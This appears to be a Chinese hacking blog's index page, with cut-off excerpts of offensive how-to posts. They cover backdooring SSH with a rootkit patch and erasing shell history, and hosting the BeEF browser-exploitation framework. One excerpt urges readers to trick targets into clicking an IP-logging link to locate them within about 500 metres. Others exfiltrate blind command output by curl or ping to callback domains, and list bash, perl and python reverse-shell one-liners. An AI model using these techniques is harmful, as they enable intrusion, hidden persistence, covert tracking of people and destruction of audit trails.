SSH后门和清除痕迹

隐藏的远程登录(w 看不到) ssh -T user @ host /bin/bash -i 或 隐藏的远程登录(w 看不到) ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -if   对于SSH来说,登录主机之后先执行: unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace 然后是SSH留后门的方法,简单来说就是以下的代码: yum install -y openssl openssl-devel pam-devel http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz http://ft […]

查看全部


在OPENSHIFT上安装BeEF

0x01:问题总结 (不喜欢看的可以pass,这个经验也适用于以后在openshift上部署其他脚本应用) 经历两天各种问题处理,终于搞定,主要问题出在OPENSHIFT免费的VPS上,没有root权限,而且各种权限被限制,使用screen 离线后台执行任务都无法让脚本一直在处于运行状态,守护进程也无法按常理使用,最终导致BeEF启动后五到十分钟自动清理会话,自动终止了BeEF进程,导致脚本类程序无法一直处于运行状态,下面该方法也适用于其他脚本程序。 使用openshift自身的命令加参数对运行的脚本程序进行进程守护 命令如下: nohup $OPENSHIFT_REPO_DIR/public/beef $OPENSHIFT_RUBY_IP $OPENSHIFT_REPO_DIR/public |& /usr/bin/logshifter -tag ruby & 命令说明: […]

查看全部


通过IP定位目标(可定位到五百米范围内)

平台地址Url: http://ip.jozxing.cc 访问后,IP会被记录。 通过在 http://ip.jozxing.cc/ips.php页面查看详细地址,查看完后请及时清空。 也可以自定义查询ip地址:http://ip.jozxing.cc/ip.php?ip=xxx.xxx.xxx.xxx 该功能主要根据目标IP定位详细地址,正常情况下,国内IP准确定位距离在五百米范围内。 (想知道对方地址,那就欺骗他点击此链接,建议找个生成短地址网站生成个短地址,那样能绕过各种绿标检测。) 由于之前想通过隐写php代码到jpg图片中,然后添加jpg后缀到apache配置文件里,让apache能够解析 jpg图片中的php代码,这样就能够把获取ip的地址(例如:ip.jozxing.cc/ip.jpg)传播到“支持url链接图片插入”的论坛里,那样妥妥能获取大量ip,并存入mongodb中 […]

查看全部


利用云眼进行无回显渗透测试姿势

云眼Url:  http://eye.jozxing.cc 主要功能,用来处理在渗透测试过程中,找到了服务器命令执行漏洞,但是无法回显结果或者检验执行是否成功,于是乎云眼出现了,利用服务器请求域名时需要查询DNS的过程,来获取结果。至于环境搭建,需要两个域名一个公网服务器,A域名做NS服务器,B域名用来获取DNS记录查看,且B域名的DNS设置为A域名(即NS)。云眼可用于 *nix,多种数据库,windows,具体利用方式如下, 1. *nix: curl http://eye.0x80.cc/`whoami` ping `whoami`.eye.0x80.cc     2. windows ping %USERNAME%.b182oj.ceye.io 0x01 SQL Injection From http://docs.hackinglab.cn/HawkEye-L […]

查看全部


Linux下多种反弹shell方法

bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本:perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);}; python版本:python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STRE […]

查看全部